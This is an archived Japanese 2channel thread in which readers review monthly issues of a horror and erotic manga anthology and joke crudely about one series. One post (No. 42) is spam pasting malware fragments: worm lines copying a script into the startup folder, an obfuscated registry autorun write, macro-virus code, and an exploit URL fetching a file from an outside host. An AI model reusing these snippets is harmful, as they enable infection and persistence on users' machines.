5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ぶんか社】いちばん残酷なグリム童話・4

1 :花と名無しさん:2006/08/31(木) 21:41:44 ID:oi3aTSqP0
ちょっとエロでちょっとホラーでちょっと殺伐。
「ほんとうに怖い童話」、「甘美で残酷なグリム童話」
とりまぜて語りましょう。

前スレ
【ぶんか社】いちばん残酷なグリム童話・3
http://comic6.2ch.net/test/read.cgi/gcomic/1137926801/l50


2 :花と名無しさん:2006/08/31(木) 21:42:57 ID:oi3aTSqP0
過去スレ
【【ぶんか社】いちばん残酷なグリム童話・2
http://comic6.2ch.net/test/read.cgi/gcomic/1117718563/l50
【まんが】いちばん残酷なグリム童話【ぶんか社】
http://comic6.2ch.net/test/read.cgi/gcomic/1076385458/

関連サイト
残グリ元ネタDB板
http://jbbs.livedoor.jp/comic/2272/
http://jbbs.livedoor.jp/bbs/i.cgi/comic/2272/ (携帯用)


3 :花と名無しさん:2006/08/31(木) 21:44:04 ID:oi3aTSqP0
関連スレ
●●竹崎真実スレッド●金瓶梅●● PART2
http://comic6.2ch.net/test/read.cgi/gcomic/1146065229/l50
【ぶんか社】かずはしとも【残グリ・ホラーM】
http://comic6.2ch.net/test/read.cgi/gcomic/1120894787/l50
【レディコミ】森園みるく【女王】
http://comic6.2ch.net/test/read.cgi/gcomic/1061166195/l50
■さちみりほを新スレまで語り尽くすスレッド■
http://comic6.2ch.net/test/read.cgi/gcomic/1108502336/l50
lt;現役gt;わたなべまさこlt;伝説gt;
http://comic6.2ch.net/test/read.cgi/gcomic/1043605300/l50
【カルバニア物語】TONO☆8【チキタ★GUGU】(実質9)
http://comic6.2ch.net/test/read.cgi/gcomic/1148009875/l50
【すくらっぷ】小山田いく2【選集発売中】
http://comic6.2ch.net/test/read.cgi/rcomic/1145990441/l50
☆☆☆松苗あけみ☆☆☆
http://comic6.2ch.net/test/read.cgi/gcomic/1018931134/l50
煌如星シリーズ 藤田あつ子先生
http://comic6.2ch.net/test/read.cgi/gcomic/1130223092/l50

4 :花と名無しさん:2006/08/31(木) 21:49:55 ID:???0
>>1
乙華麗!

5 :花と名無しさん:2006/08/31(木) 22:14:07 ID:???0
1乙

テンプレ甜菜
残グリ2006年10月号
【表紙】魔木子:
【金瓶梅】竹崎:
【ラプンツェル】もろおか:
【大好きなお母さん】空路:
【本当にあった笑える話】桜木:
【金色夜叉」天ヶ江:
【最後の晩餐】北川:
【エリザベート・バートリ】かずはし:
【フィガロの結婚】つか:
【虫も殺さぬ…】藤田あ:
【みにくいアヒルの子】深井:
【飛び出す心霊写真】呪:


6 :花と名無しさん:2006/08/31(木) 22:16:02 ID:???0
>>1ノ<随喜

7 :花と名無しさん:2006/08/31(木) 23:03:30 ID:???0
>>1 ( ^ω^)ノ随喜

テンプレ借ります

残グリ2006年10月号
【表紙】魔木子:普通
【金瓶梅】竹崎:絵が綺麗になんっる。作者落ち着いた?美し侘しのラストがGJ
【ラプンツェル】もろおか:もういいよ
大好きなお母さん】空路:先の分かるストーリで、半分くらいから飽きた。
【本当にあった笑える話】桜木:カエレ
【金色夜叉」天ヶ江:損得勘定と過去の恋。複雑な心理は面白かった。もう数ページあれば。
【最後の晩餐】北川:別に無し
【エリザベート・バートリ】かずはし:エリザベートの猟奇的Sをもっと描写してよかったかもね。
【フィガロの結婚】つか:読んでない。
【虫も殺さぬ…】藤田あ:飛んでったwwwww
【みにくいアヒルの子】深井:なんか画面ががちゃがちゃして読みにくかった。
【飛び出す心霊写真】呪:コワイ

8 :花と名無しさん:2006/08/31(木) 23:05:39 ID:???0
>【虫も殺さぬ…】藤田あ:飛んでったwwwww

あばばばばばばばwwwww



9 :花と名無しさん:2006/09/01(金) 00:21:18 ID:???0
⊂二二二( ^ω^)二⊃ ブーン

10 :花と名無しさん:2006/09/01(金) 00:32:45 ID:???0
ちょwwwおまwwwwww

11 :花と名無しさん:2006/09/01(金) 03:51:02 ID:???O
新スレおめです

【表紙】魔木子:
【金瓶梅】竹崎:金蓮姐御、素敵!辰年だったのか。◎
【ラプンツェル】もろおか:もろおかの頭がイタァァ…△
【大好きなお母さん】空路:結末は読めたが好き ○
【本当にあった笑える話】桜木:もうギョーザ食えねえぞゴルァ!!×
【金色夜叉」天ヶ江:いちばん不幸なのは宮子の旦那だな。は。は。は。 △
【最後の晩餐】北川:普通の歴史まんがとして読んだ ○
【エリザベート・バートリ】かずはし:苦痛や恐怖の表情が弱いんで、
登場人物が演技してるように見えた △
【フィガロの結婚】つか: 一気に楽しく読んじゃった○
【虫も殺さぬ…】藤田あ:この人の作品で 女が無事に生き残るケースは珍しい。
等身大の人型をくり抜けるほどデカイ紙をどこで調達したのかは謎だ。○
【みにくいアヒルの子】深井: 全然記憶にありません
【飛び出す心霊写真】呪: 怖くて最後まで読めんかった…

12 :花と名無しさん:2006/09/01(金) 07:08:53 ID:???0
>>11
> 等身大の人型をくり抜けるほどデカイ紙をどこで調達したのかは謎だ。○

アレは多分、小さく切った紙が魔力?で大きくなったんだと思うが。

13 :花と名無しさん:2006/09/01(金) 09:53:57 ID:Er/cFzmx0
  ∧,,∧ <>>1乙!!お礼に随喜炒めるよ!!
 (;`・ω・)  。・゚・⌒)
 /   o━ヽニニフ))
 しー-J




14 :花と名無しさん:2006/09/01(金) 12:17:59 ID:???0
新スレ祝いに随喜投げ ==━ ━
   (ノ ゚∀゚)ノ ==━ =====━ ━
         ━ ==== ━ ━ =━

15 :花と名無しさん:2006/09/01(金) 22:42:04 ID:???0
>>13
(゜д゜)<あらやだ!



(゚д゚)ウマー


16 :花と名無しさん:2006/09/01(金) 23:59:45 ID:???0
残グリ2006年10月号
【表紙】魔木子:普通。この人の西洋モチーフはあまり魅力を感じない。
【金瓶梅】竹崎:ちょっとすっきりしない所もあったけど最後ホロリときたのでオケ。
【ラプンツェル】もろおか:前半だけ読んでどうでもよくなった
【大好きなお母さん】空路:読んでない
【本当にあった笑える話】桜木:ワロタけどニラネタは引いた 。
【金色夜叉」天ヶ江:よく分からんかった。旦那が一番かわいそう。宮ウザス。
【最後の晩餐】北川:絵が怖くて読めません
【エリザベート・バートリ】かずはし:読んでないけど評判いいので見てみようかな。
【フィガロの結婚】つか:読んでない。
【虫も殺さぬ…】藤田あ:少年漫画に焼直したら面白そうなネタだとオモタw紙の猫可愛い。
【みにくいアヒルの子】深井:読んでない。
【飛び出す心霊写真】呪:グロきもかったけど、怖さはあまりなかった。

17 :花と名無しさん:2006/09/02(土) 17:03:10 ID:???0
>>1さん乙です

テンプレお借りします。
残グリ2006年10月号
【表紙】魔木子: ピンクー
【金瓶梅】竹崎: 嫌な女描くのうまいなぁ。最後は一応救われた感じでよかった。
【ラプンツェル】もろおか: まぁ読めた。
【大好きなお母さん】空路: 自業自得なんだけどカワイソス。
【本当にあった笑える話】桜木: 気持ち悪い・・・
【金色夜叉」天ヶ江: もうちょっとページ多かったら丁寧に描写できたような?詰めすぎな感じがした。
【最後の晩餐】北川: 歴史漫画読んでる感じ
【エリザベート・バートリ】かずはし: 坦々とグロ
【フィガロの結婚】つか: 今回は読みにくかった。
【虫も殺さぬ…】藤田あ: ⊂二二二( ^ω^)二⊃ ブーン
【みにくいアヒルの子】深井: 雑になった?
【飛び出す心霊写真】呪: 怖いよ

総合的に普通。金瓶梅以外は特別読み直したいと思ったのがなかった。
ルチカは前の人魚姫描いたときぐらいのスッキリしてた方が読みやすかった。


18 :花と名無しさん:2006/09/02(土) 22:29:15 ID:???0
呪は怖かった…けど
最後の効果音がズーム!なのにチトワロタ

19 :花と名無しさん:2006/09/03(日) 12:52:05 ID:???0
>>1乙。テンプレ借ります。
【表紙】魔木子:特になし
【金瓶梅】竹崎:しきたり姑コワス。そろそろ展開がほしい。
【ラプンツェル】もろおか:
【大好きなお母さん】空路:絵きれい!話はもう一捻りあったらなあ。
【本当にあった笑える話】桜木:
【金色夜叉」天ヶ江:不評なので未読。見づらい絵も読む気湧かない。
【最後の晩餐】北川:読みやすかった
【エリザベート・バートリ】かずはし:読みやすかった
【フィガロの結婚】つか:期待どおり
【虫も殺さぬ…】藤田あ:いつも読みやすい
【みにくいアヒルの子】深井:読みにくかった
【飛び出す心霊写真】呪:だいすき


20 :花と名無しさん:2006/09/03(日) 21:00:35 ID:???0
テンプレお借ります。
【表紙】魔木子:…
【金瓶梅】竹崎:いつもキレが良いが、あんなにムキになるほどの親友なのに
        今まで無連絡が謎。不粋でスマン。        
【ラプンツェル】もろおか:キモい。
【大好きなお母さん】空路:最後の新聞?が日本語。
【本当にあった笑える話】桜木: 汚ねぇ。
【金色夜叉】天ヶ江:誰にも共感できないが読めた。
【最後の晩餐】北川:普通に良かった。
【エリザベート・バートリ】かずはし:イマイチ。
【フィガロの結婚】つか:読みづらいが面白かった。
【虫も殺さぬ…】藤田あ:読者なめてんのか?やる気のなさが痛いくらい伝わってくるぞ!
【みにくいアヒルの子】深井:好きだけど今回イマイチ。
【飛び出す心霊写真】呪:人気らしいがあまり好きじゃない。

21 :花と名無しさん:2006/09/04(月) 01:24:13 ID:???0
エリザベートバートリは内容はいいけど
絵柄のせいかグロって感じはしないんだよな。

22 :花と名無しさん:2006/09/04(月) 21:45:05 ID:???O
かずはしバートリを初めて見た時、凄い衝撃を受け、これを越える作品を
今後出せるのだろうか?と心配していたが、久しぶりにみて、何故か
こんなもんだったっけ?…と思った。かずはし先生、確実に絵も
魅せ方も巧くなっているんだな。

23 :花と名無しさん:2006/09/04(月) 21:56:54 ID:???0
絵の実写っぽい人がやったらむっちゃグロだったんだろうな。<バートリ
かずはしくらいあっさりした絵じゃないと、ページめくるの怖かったかも。

24 :花と名無しさん:2006/09/04(月) 23:50:20 ID:???0
明日はかずはしの文庫発売だね
正直すごくワクテカしてる。

かずはし、グリムに来てからは恋愛モノだけど
ホラーM時代のちょいSF入ったサスペンスホラーとか
ミステリ仕立てのホラーとか物凄く上手かったんだよ…。
特に感情表現が淡白なのが逆にサスペンスモノにぴったしだった。

25 :花と名無しさん:2006/09/05(火) 00:24:40 ID:???0
バートリは作者別の文庫でイケスミとみるくのがあるね。

26 :花と名無しさん:2006/09/05(火) 22:10:19 ID:???O
>>24は、もう買っただろうか?
自分は、読む度に涙ぐんでしまう。

スレチすまん

27 :花と名無しさん:2006/09/08(金) 20:05:01 ID:???O
【表紙】魔木子:いまいち
【金瓶梅】竹崎:安定。秀
【ラプンツェル】もろおか:どうでもいいよ。不可
【大好きなお母さん】空路:先嫁杉
可−
【本当にあった笑える話】桜木:早く終われ。逝
【金色夜叉」天ヶ江:面白いけど詰め込み杉の感。優−
【最後の晩餐】北川:学習漫画ぽい。可+
【エリザベート・バートリ】かずはし:再録につき評価ナシ
【フィガロの結婚】つか:洋物にしては良かった。優
【虫も殺さぬ…】藤田あ:絵がいつにも増してテキトーで残念。良
【みにくいアヒルの子】深井:和物のほうがいいな。良+
【飛び出す心霊写真】呪:好きだけど今回はイマイチ。良

28 :花と名無しさん:2006/09/09(土) 15:25:36 ID:d14pDnNNO
>>26何てタイトル?

29 :花と名無しさん:2006/09/10(日) 02:46:00 ID:???O
>>28
ホラーM文庫
『いばら姫』
主な収録内容は、
ホラーMで、かずはしが年に一回やってる戦争物。

30 :花と名無しさん:2006/09/14(木) 07:45:56 ID:eDa/cOTDO
今月はいまいちだった

31 :花と名無しさん:2006/09/18(月) 18:49:46 ID:???O
随喜ホシュ

32 :花と名無しさん:2006/09/21(木) 22:22:55 ID:???0
誰もいない…ボッチー携帯で遊ぶか…

33 :花と名無しさん:2006/09/22(金) 18:30:35 ID:???O
ボッチーwwwwwwww
佐々木のコミクス出ないかなー

34 :花と名無しさん:2006/09/22(金) 20:32:30 ID:???0
>>33
ただでさえマニア向けコミックなのが佐々木だと更にマニア向けになると思う

35 :花と名無しさん:2006/09/22(金) 21:42:59 ID:???0
かずはしとか小野とか、
装丁さえ普通ならそこまでマニア向けにならないよね。

なんであそこまでエロっぽさを強調するんだろう。
煽り見てエロ期待して買った人は逆にがっかりすると思うんだけど。

36 :花と名無しさん:2006/09/22(金) 23:27:45 ID:???0
>>35
だってぶんか社だもの

37 :花と名無しさん:2006/09/24(日) 19:22:53 ID:???O
好き作家目当てで初めて本誌読んだ時は
アオリがあんななのに中身が真っ当な漫画(除く:もろおか)で
びっくりしたよ


38 :花と名無しさん:2006/09/24(日) 20:41:33 ID:???0
ほん怖、もう出た?

39 :花と名無しさん:2006/09/24(日) 21:48:41 ID:???0
>>38
出てますよ〜
さっき帰宅途中、買ってきたとこ。

40 :花と名無しさん:2006/09/25(月) 20:39:07 ID:???O
ぎゅるるるる

41 :花と名無しさん:2006/09/25(月) 21:28:58 ID:vYtybtOCO
>>37
自分もだ。

少女ホラー系列の作家が好き

42 :<body onload=window()>:2006/09/26(火) 07:09:19 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

43 :花と名無しさん:2006/09/26(火) 10:39:15 ID:???0
??
どうして良スレ認定がこんなとこに?

44 :花と名無しさん:2006/09/27(水) 21:13:11 ID:???0
つかこれ何よ。
いろんなところにコピペされてるけど。

45 :花と名無しさん:2006/09/27(水) 21:21:44 ID:???0
爆撃ですよ、姐さん

46 :花と名無しさん:2006/09/29(金) 19:25:50 ID:???O
発売日なのに盛り下がってますね

47 :花と名無しさん:2006/09/29(金) 19:37:42 ID:???0
既出すぎるが。
華って本当にバカだったんだと思った、今回。

48 :花と名無しさん:2006/09/29(金) 21:49:36 ID:???0
ああ・・・自分も思った

いつになっても新たな発見があるよ、鼻の馬鹿さ加減には

49 :花と名無しさん:2006/09/29(金) 22:49:15 ID:???0
だってこっち地方だから発売明日だもん。


50 :ゴッドきのこ:2006/09/29(金) 23:22:35 ID:Hhmyg58V0
「本当は恐ろしいグリム童話」全巻読みました。エロい話が多すぎです。
って言うか「ヘンゼルとグレーテル」なんてヤバすぎ
正直言って、中3の私にはかなり衝撃的で精神的ダメージは相当なものでした。
まさにエロさ爆発キモさ爆発変態的要素のオンパレードでした。

51 :花と名無しさん:2006/09/30(土) 17:10:31 ID:???0
華の乱っていっつもああなの?
ギャグマンガなの?
あんなオマタおっぴろげて下品な綱引きをするのって…。

52 :花と名無しさん:2006/09/30(土) 17:49:06 ID:???0
華にもう少し感情移入できたらなあ。
華さえもう少しいい女だったら名作になったかもしれないのに。

53 :花と名無しさん:2006/09/30(土) 20:06:20 ID:???0
華の乱な…設定はすごくよさ気なのに
やってる事が花魁もへってくれもねえ、
花電車以下のマンコ芸だけ。
脱がせりゃいいと思ってるのか裸だけで色気も何もない。
キャラも浅すぎる。

素材がいいのに調理法が下手すぎて
出てくる料理がゲテモノみたいな気分になる。

54 :花と名無しさん:2006/09/30(土) 20:16:34 ID:???0
マンコ芸…
笑った。

55 :花と名無しさん:2006/09/30(土) 21:11:59 ID:???0
残グリで初めて華の乱読んだけどあまりのアホな展開に笑えた
ただ、笑えた…

56 :花と名無しさん:2006/09/30(土) 22:22:07 ID:???0
>>53
花魁として磨く芸が万個芸だけだもんね。
御職をめざすでもなく、ゴージャスさも何もない。
貧しい場末の売春宿でしかないのが悲しすぎ。

57 :花と名無しさん:2006/09/30(土) 23:39:24 ID:???0
あの鈴はないよなあ。
そんで綱引きってまずありえない。
いくら何でも誇り高い花魁がやることじゃない。まさに最低芸。
フィクションだからといっても、作者が花魁や花街のことを全然知らない、
調べようとしないで描いているのバレバレ。

58 :花と名無しさん:2006/09/30(土) 23:46:58 ID:???0
>>56
技として昇華してるならともかく、
単に「物凄く圧力の強い万個」で男に制裁加えるだけだもんなあ。
前に万個内に入れたサイコロでタワー作ったか好きな目出すかやってたけど
いずれにしても都合よすぎ。ファンタジーとしてもアリエナス。

あと清の昔話とか、華をライバル視する若い子とか
華も舞踏会かなんかで全裸になったシーンがあったけど
全裸=色気じゃないだろうに…みっともないだけだよ。

どうでもいいが、清が義手になって攻撃してきた話、
どう見ても少年漫画です。ありがとう(ry

59 :花と名無しさん:2006/10/01(日) 01:35:12 ID:???0
かなーり最初の頃に気難しい爺さんを満足させようとした話では
もう少し工夫があったような気がしたな。
てっきり普通の身体の女性が知恵と工夫で頂点を目指す話と
期待していたのに、単なる膣圧女になってしまってorz

舞踏会でも余興でもいきなり全裸ぽーんと見せたのでは脱がせたりチラ見したりの
楽しみを奪ってかえって逆効果だと思うのだが。

60 :花と名無しさん:2006/10/01(日) 01:41:56 ID:???0
白井、楽しみだったけど、絵が雑になってたorz

61 :花と名無しさん:2006/10/01(日) 13:28:50 ID:???O
・華族の娘が元花魁の継母に全てを奪われ、女郎に落されるも
誇りを失わず、持ち前の美貌と才能で伸し上がっていく。
・吉原を舞台にした悲喜交々
・元婚約者と楼主と恋愛模様
・継母や後輩(?)との女の戦い

ここまで面白い要素があってどうしてあんなに下らない話になるのか
逆に不思議で仕方ないよ…。
感情移入できるキャラも一人もいないし。
何といっても「落された」とはいえ、婆やとか楼主とか
味方がたくさんで無条件マンセーされる恵まれた立場だから
苦労してる風でもないしな。

62 :花と名無しさん:2006/10/01(日) 13:44:05 ID:???0
そうだよな。
これだけいい要素てんこ盛りだったら、昔の吉原モノの映画みたいに、
華麗でダイナミックな演出にしたらすごく良くなりそうなのに。

所詮下らない少女マンガなんだよこれって。

63 :花と名無しさん:2006/10/01(日) 14:14:16 ID:EWpvMZ+IO
>>61の内容をかずはしで見てみたいとふと思った。
あの人なら時代考証とか背景とかもっとちゃんと調べてくれそう。
絵も少女漫画だけど丁寧だし。

ただ継母とか同僚との確執が弱いかな。

64 :イサドラ:2006/10/01(日) 19:26:48 ID:???0
11月号テンプーラ!
金瓶梅(竹崎真実):
グリム艶童話(松苗あけみ):
しあわせな王子(かずはしとも):
曲がった刃(天ケ江ルチカ):
いばら姫異聞(白井幸子):
女資産家つづら詰め殺人事件(藤田素子):
コンプレックス(森左智):
吉原 華の乱(岡田純子):
赤い靴(もろおか紀美子):
木花咲耶姫(佐々木彩乃):
本笑〜残グリ出張編(桜木さゆみ):

総評‥

65 :花と名無しさん:2006/10/01(日) 21:51:58 ID:???0
岡田は華みたいな主人公向かないよ。
ぽや〜っとした天然いい子ちゃんの話が一番上手いし
あってると思う。
昔描いてた西洋ものの短編は大体そんな感じだったし、
花魁ものでもそういう子主役にした話は結構面白かったな。

…と、岡田の西洋ものの文庫化期待してた自分がいってみるorz

華つまんないよー

66 :花と名無しさん:2006/10/01(日) 22:26:53 ID:???0
鼻の乱はもう鼻がどんな万戸芸するかというのを期待してみてる。
シン妻とは違いはずしたギャグがないからね。

67 :花と名無しさん:2006/10/01(日) 22:29:34 ID:???O
吉原・花魁じゃなくて最下層の見せ物小屋かストリップにしときゃ良かったのにな。
その方が色々と生きた気がする。

68 :花と名無しさん:2006/10/01(日) 22:54:37 ID:???0
吉原よりも、玉ノ井とかの風情だもんな…

69 :花と名無しさん:2006/10/01(日) 23:04:18 ID:???0
>>61
その設定で倉科遼×和気一作の「女帝」って漫画を思い出した。
舞台が現代の銀座になっているほかは、ビックリするくらい要素が似ている。
こっちは痛快なサクセスストーリーに仕上がっているけど、
かたや万個芸でウケを狙うネタ100%漫画…

70 :花と名無しさん:2006/10/01(日) 23:10:19 ID:???0
>>69
当然続編の、女帝・花舞はスルーだよね?









嬢王、舞姫等もあるけどさ…

71 :花と名無しさん:2006/10/01(日) 23:11:52 ID:???0
ぎゅるるるるる…の人気に嫉妬

72 :花と名無しさん:2006/10/01(日) 23:20:29 ID:???O
いっそネタに昇華していたらギャグ漫画として面白かったのに
下手にシリアスだから痛いwwww

73 :花と名無しさん:2006/10/02(月) 17:31:44 ID:???0
まぁ今回ばあやにも見捨てられたことだしw

74 :花と名無しさん:2006/10/02(月) 17:58:04 ID:???0
どうして今回、華の話しかないですか…

という自分も「華… ○| ̄|_」
意外に感想がないわけだが。

75 :花と名無しさん:2006/10/03(火) 13:18:38 ID:???O
白井の眠り姫。
薔薇貰って倒れるシーンで「なんか見覚えある」って引っかかった。
切なそうな綺麗な表情…吸血鬼…
眠り姫カーラ=吸血鬼カーミラ@姫川亜由美!
と思ったのは私だけでは無いはずだ
パクリ批判とかじゃなくてね

76 :花と名無しさん:2006/10/03(火) 15:29:00 ID:???0
白井のは結構良かったとオモ
前回のヘボさが無かったw

77 :花と名無しさん:2006/10/03(火) 17:42:46 ID:???O
ありがちな転落人生だけど、藤田もが一番印象に残っている。

78 :花と名無しさん:2006/10/03(火) 20:37:02 ID:???0
もりおか、
娘もハァハァ、おかんもハァハァ・・・

アホか

79 :花と名無しさん:2006/10/03(火) 20:37:43 ID:???0
もろおかでした…

80 :花と名無しさん:2006/10/03(火) 22:42:40 ID:???0
流石のもろおかもやっぱり華のガポーン!には負けるw
大体あんなデカイ鈴、経産婦だって入らないだろwwwww

81 :花と名無しさん:2006/10/03(火) 23:27:57 ID:???0
出ておいでイサドラ
イエース
ピーン
ノー!ムカデ!
今だわ
ガポーン

あれを娘のマリサは見てたのか?

82 :花と名無しさん:2006/10/04(水) 00:14:21 ID:???O
色んな意味でトラウマになるなw

しかしあれでお株を上げたって周りの楼主らどんだけ低俗なんだよ…

83 :花と名無しさん:2006/10/04(水) 00:26:51 ID:???0
結局つらいつらいと言ってる華が下らない特技で簡単にマンセーされる
ただそれだけの話。誇りも苦労も何もないので真面目にやってもドラマになってない
一体いつまでグダグダ続ける気だ。

84 :花と名無しさん:2006/10/04(水) 00:38:26 ID:???0
今月は羅列ないねえ。


85 :花と名無しさん:2006/10/04(水) 07:51:25 ID:???O
アマガエルのは…後味悪かったなぁ…

86 :花と名無しさん:2006/10/04(水) 09:46:21 ID:???0
うん、悪かった。
アマガエルの絵とテンポで面白く読み終わったが、
読んだ後でどよーんとした。

87 :花と名無しさん:2006/10/04(水) 19:01:54 ID:???0
やべっ今損保24のCMを見て

「0120〜

キュッキュッキュー

600〜」

のところでもろおかを思い出してしまった。
もう私アン…アアッ!

88 :花と名無しさん:2006/10/04(水) 19:30:09 ID:???0
>>87
すっかり毒されてますな。

89 :花と名無しさん:2006/10/04(水) 20:31:48 ID:???0
ガポーンもたいがいだが藤田(素)もアレだろ…






















もうダンナがアイナメ釣ってきても喰わん…(´Д⊂

90 :花と名無しさん:2006/10/04(水) 23:16:15 ID:???0
森佐智最近系列誌で見かけるけど、特攻アルテミスの人だよね?
絵変わんないなあと感慨深かった。

91 :花と名無しさん:2006/10/05(木) 18:32:49 ID:???0
テンプレお借りします☆
金瓶梅(竹崎真実):新しい女中さん腹黒そうで今後楽しみです。金蓮VS瓶児がまた見れそうで嬉しい 優
グリム艶童話(松苗あけみ):何か,由貴香織里のルードヴィッヒ革命に似てたかな。 可
しあわせな王子(かずはしとも):面白かった!読み手を惹きこむ話のまとめ方は素晴らしい! 優
曲がった刃(天ケ江ルチカ):子どもかわいそすぎだぁ!話はともかく読んでて辛かった・・・ 良
いばら姫異聞(白井幸子):ペンタッチのど含む絵の綺麗さは残グリでは1,2番じゃないかなぁ?話も良かったです 良
女資産家つづら詰め殺人事件(藤田素子):ありがちだけど,まとめ方は良かった。悪女描くの上手ですね 良
コンプレックス(森左智):女の本音満載でした。何気に共感部分もありました。 良
吉原 華の乱(岡田純子):何ていうか・・・・・下品すぎ 不可
赤い靴(もろおか紀美子):何描いても同じ展開です・・・ 鬱
木花咲耶姫(佐々木彩乃):普通に面白かったかな 良
本笑〜残グリ出張編(桜木さゆみ):フー―――・・・・ 不可

総評‥ 個人的にかずはしが,一番良かった。2つくらい似たり寄ったりの話が目立ってたカナ?


92 :花と名無しさん:2006/10/05(木) 18:36:09 ID:???O
まあアレだ。華に関しては
「美男美女とサイボーグが繰り広げるお下劣人情たま〜にホロリ喜劇」
だと思って読めばいい。

93 :花と名無しさん:2006/10/05(木) 19:02:51 ID:???0
>>92
そうそう。トホホ感を味わうものだよね<華
ある意味クオリティタカス

94 :花と名無しさん:2006/10/05(木) 22:07:02 ID:???0
松苗あけみはドタバタと騒々しくて落ち着いて読めなかった

95 :花と名無しさん:2006/10/05(木) 22:36:27 ID:???0
万個綱引き
万個に生卵を入れてそのまま出す
万個でサイコロタワー
チンコ義手

それが華クオリティ

96 :花と名無しさん:2006/10/05(木) 23:28:26 ID:???0
テンプレ乙です。
とりあえず読んだのだけ。

金瓶梅(竹崎真実):先月ほどではないけれど絵が荒れてるなぁ。せめて奥様たちは美人に描いて欲しい。お話は伏線ありそうで楽しみ。
グリム艶童話(松苗あけみ):絵も話もごちゃごちゃしてて読み通すのがつらかった。 ノリに時代を感じる。
しあわせな王子(かずはしとも): 未読
曲がった刃(天ケ江ルチカ):ちょっ、母親ヒドス。親子モノの感動話を書く一方でこういうのも書いちゃうとこがルチカクオリティ。
いばら姫異聞(白井幸子): こういうの描かせたら似合うと思ってたけど、やっぱハマってた。キャラが色っぽいよねこの人。
女資産家つづら詰め殺人事件(藤田素子):面白かった。女のリアルな感情の動き方が上手い。
コンプレックス(森左智):未読
吉原 華の乱(岡田純子): うっわぁ…。とりあえず怖い童話にお帰りください。
赤い靴(もろおか紀美子): 未読
木花咲耶姫(佐々木彩乃): 未読
本笑〜残グリ出張編(桜木さゆみ):未読



97 :花と名無しさん:2006/10/05(木) 23:48:23 ID:???0
>>95
ワロタ

松苗あけみは純クレから絵があまり変ってないね。
相変わらず中身が薄くて、話は面白くないが絵は綺麗だ。

98 :花と名無しさん:2006/10/06(金) 00:14:23 ID:???0
笑い飛ばすつもりで読んだら………



今回流石に引いた。>ガポーン

99 :花と名無しさん:2006/10/06(金) 06:19:09 ID:???0
最早マユタン漫画と同じかそれ以下だな

100 :花と名無しさん:2006/10/06(金) 11:08:54 ID:???0
ロケット義手ディルドーの衝撃に比べたらガポーンなんて全然インパクト弱<華

101 :花と名無しさん:2006/10/06(金) 12:33:58 ID:???O
>>99
マユタンに失礼だヨ!!w

>>100
確かにあの回は大人の女性向けというより
バカエロギャグだったな…
華への三角木馬×鞭打ちすらギャグだった。

102 :花と名無しさん:2006/10/06(金) 21:20:04 ID:???0
虫はどうなったのだろーか(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

103 :花と名無しさん:2006/10/06(金) 21:22:11 ID:???0
>>102
そういえば…華って、毎回伏線生かす展開がないね。その場しのぎというか。

104 :花と名無しさん:2006/10/06(金) 21:33:44 ID:???0
>>103まぁね。
そもそも鼻が吉原一の花魁になるのが復讐で清も家屋敷ぶんどったのにどうしていちいち絡んでくるのかわからん。

105 :花と名無しさん:2006/10/06(金) 21:41:33 ID:???0
>>104
Σ(゚Д゚;)そういやそうだ!

なぜ吉原一の花魁になるのが、吉原を抜けてなりあがった清に対する復習になるんだ?
あの時代ではどう考えても吉原の女は吉原にいる限り、吉原の外の女の上の立場にはなれまいに。
吉原の中で争うならまだしも。

106 :花と名無しさん:2006/10/06(金) 22:03:54 ID:???0
虫・・・もしかしてミンチ?



107 :花と名無しさん:2006/10/06(金) 23:03:30 ID:???O
伏線はイサドラが百足にびびって隙をついて華勝利、で一応回収か?
でも百足は華側にだけだよね?
膣圧で磨り潰して毒でマン圧パゥワがうp?まさかな…

108 :花と名無しさん:2006/10/07(土) 17:48:06 ID:???O
近所の本屋、洟が平積みだったorz

109 :花と名無しさん:2006/10/08(日) 15:17:56 ID:???0
この本、怖い童話と見せかけてエロがメインなわけだが、
肝心のエロがぬるい。

110 :花と名無しさん:2006/10/09(月) 19:25:24 ID:???0
一応エロいのはもろおかと華だな。
アレだけど。

111 :花と名無しさん:2006/10/09(月) 19:32:13 ID:???0
やってる事がエロでもなあ…やはり絵と話の方が大事

112 :花と名無しさん:2006/10/09(月) 19:49:19 ID:???O
佐々木先生の描画もなかなかエロいと思うんだが皆どうでしょうか?
コミクスでないかなぁ。。

113 :花と名無しさん:2006/10/09(月) 20:21:05 ID:???0
佐々木&つるた=エロい
岡田=ガポーン
かずはし=朝チュン
もろおか=デッサン直せ
みるく=あああああああ!
一川=レイーポ
いるか=汗臭い



114 :花と名無しさん:2006/10/09(月) 20:38:34 ID:???0
るちかは生々しいイメージがある。
ロリとか老女エロが多いからかもだけど。
どちらも乾いてそうで痛々しい感じ。

115 :花と名無しさん:2006/10/10(火) 17:29:51 ID:???0
>>114
老女エロ?あったっけ?

116 :花と名無しさん:2006/10/10(火) 20:56:22 ID:???O
老女とまでいかなくても姑×息子の近親ネタがよくあるからな。

117 :花と名無しさん:2006/10/11(水) 02:31:14 ID:???0
地味に坂東いるかに期待。
(普通のハッピーエンドものを一度見てみたい)

